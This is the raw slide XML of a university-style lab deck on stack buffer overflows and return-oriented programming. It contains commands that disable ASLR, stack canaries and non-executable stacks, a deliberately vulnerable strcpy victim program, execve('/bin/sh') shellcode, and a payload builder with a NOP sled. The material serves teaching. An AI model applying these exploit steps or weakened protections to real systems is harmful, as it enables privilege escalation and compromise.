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16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C711C2C-3503-8640-9C48-67DEFEA80414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6BEE54-9408-3D4D-8E08-739CF738E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605D-2E52-A64D-983E-FE543805E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Cyber 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D6B6E-6B77-A041-B36C-2CC31761B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RoP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and stack attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="144981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567E-9F3A-0540-9C10-576770A9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How to disable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6B02-DA66-164C-9F42-EA115CEF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2340"/>
            <a:ext cx="10058400" cy="4469860"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/proc/sys/kernel/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>randomize_va_space</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The following values are supported:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>0 – No randomization. Everything is static.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1 – Conservative randomization. Shared libraries, stack, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(), VDSO and heap are randomized.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2 – Full randomization. In addition to elements listed in the previous point, memory managed through </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>brk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() is also randomized.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>echo 0 | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> tee /proc/sys/kernel/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>randomize_va_space</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>echo 2 | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> tee /proc/sys/kernel/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>randomize_va_space</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kernel.randomize_va_space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A4FF-A3BB-3E4D-9515-EB19DA39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47CA-7985-D74C-AD3B-B739B821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 switch to disable DEP per process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-z </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>execstack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compile switch disable canary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-stack-protector</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="109347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DDE-42DB-F94B-A023-96C647DA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How to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>setuid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5BF-EA87-5845-A677-D6E52EDA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u+s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> filename.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="272699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CE6-AE24-F04A-9FEA-7DE338A4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A3DF-BDB6-3D49-A5AE-C6C442E6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4373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copy_and_echo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 p)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buffer[48];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(buffer, p);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	puts(buffer);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DB2F0-F872-E642-B22F-9728FA53BF39}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6099243" y="2093976"/>
            <a:ext cx="5029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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &lt; 2)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>		return -1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>copy_and_echo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27A3-8219-674B-B774-7B5434FE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4AEA-27F5-5C40-96F2-B593363C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("pop %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rbp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movq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> $0x68732f6e69622fff, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"); //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shr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> $8, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>");   // add a null terminator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pushq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>");     // push onto the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mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rsp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"); // </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rdi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -&gt;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xor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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"); 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xor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%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rdx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"); 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xor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eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"); 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mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> $0x3b, %al"); //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asm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> volatile ("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>");    // </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>("/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>",NULL,NULL);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>} 			    //           </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rdi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   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8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E66E-AC58-ED4E-9659-43E8F0C1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22" y="282879"/>
            <a:ext cx="5554689" cy="63708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#define BUF_SIZE 512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argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &lt; 5)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(stderr, "./prog </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>assumed_shellcode_addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> padding shellcode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>outputfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>\n");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>		return -1;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char* buff = (char*)malloc(BUF_SIZE);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memset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(buff, 0x90, BUF_SIZE);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bad_fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = open(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[3], O_RDONLY);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bad_fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &lt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>0) goto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> clean1;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025A8-AAE5-6B45-AAE3-AC3A4B34965D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6731540" y="301557"/>
            <a:ext cx="49805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 = read(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bad_fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, buff, BUF_SIZE);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	unsigned long </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>return_addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = 			</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>strtoul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 NULL, 16);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padding_length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = 		(unsigned </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) 				</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>strtoul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[2],NULL,16);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>memcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>buff+r+padding_length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, 		&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>return_addr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(unsigned 	long));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output_fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = open(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[4], 	O_WRONLY | O_CREAT | 	O_TRUNC);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>output_fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &lt; 0)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clean2;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	write(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>output_fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, buff, r + 8 + 	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>padding_length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> /*BUF_SIZE*/);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	close(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>output_fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	clean2:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>		close(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bad_fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	clean1:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>		free(buff);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6B94-6766-AF4E-A27B-B375F7C9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80" y="2721993"/>
            <a:ext cx="10058400" cy="1609344"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You can guess or use debugger </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>to find </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the stack address</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2226874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{86696CE6-6976-ED43-A31B-53740032862F}tf10001070</Template>
  <TotalTime>1195</TotalTime>
  <Words>732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Introduction to Cyber Lab 5</vt:lpstr>
      <vt:lpstr>How to disable ASLR</vt:lpstr>
      <vt:lpstr>How to compile </vt:lpstr>
      <vt:lpstr>How to setuid bit</vt:lpstr>
      <vt:lpstr>Victim program</vt:lpstr>
      <vt:lpstr>Shell code</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>You can guess or use debugger to find the stack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 Lab 1/3</dc:title>
  <dc:creator>Zaidenberg, Nezer</dc:creator>
  <cp:lastModifiedBy>Zaidenberg, Nezer</cp:lastModifiedBy>
  <cp:revision>17</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-07-27T01:31:30Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-04-24T11:45:18Z</dcterms:modified>
</cp:coreProperties>
</file>